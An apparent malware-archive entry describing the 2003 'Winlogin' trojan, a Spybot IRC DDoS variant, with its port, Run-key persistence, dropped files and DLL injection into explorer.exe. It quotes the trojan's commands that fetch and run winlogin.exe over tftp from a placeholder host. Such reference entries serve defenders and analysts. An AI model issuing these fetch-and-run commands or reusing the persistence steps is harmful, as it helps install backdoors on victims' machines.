Winlogin
Released 21 years, 1 month ago. August 2003
Copyright © MegaSecurity
By ?
Informations
Author | ? |
Family | Winlogin |
Category | Remote Access |
Version | Winlogin |
Released Date | Aug 2003, 21 years, 1 month ago. |
Additional Information
Server:
port: 113 TCP
startup:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce "winlogon"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "NDplDeamon"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "winlogon"
c:\windows\system.ini, [boot] "shell"
added:
c:\WINDOWS\SYSTEM\winlogin.exe
c:\WINDOWS\SYSTEM\yuetyutr.dll (Backdoor.SdBot.au)
c:\WINDOWS\TEMP\vhbmhbze.txt
remarks:
A variant of the Spybot IRC DDoS zombie.
The trojan infects a system using the RPC/DCOM exploit shellcode.
It runs the following commands:
C:\WINNT\system32>tftp -i x.x.x.x GET winlogin.exe
C:\WINNT\system32>start winlogin.exe
C:\WINNT\system32>winlogin.exe
the dropped yuetyutr.dll is injected into the explorer.exe process by winlogin.exe
If you recognize any personal information on this page and wish to have it removed or redacted, please contact us at jplesueur@phrozen.io. We are committed to protecting your privacy in accordance with GDPR regulations.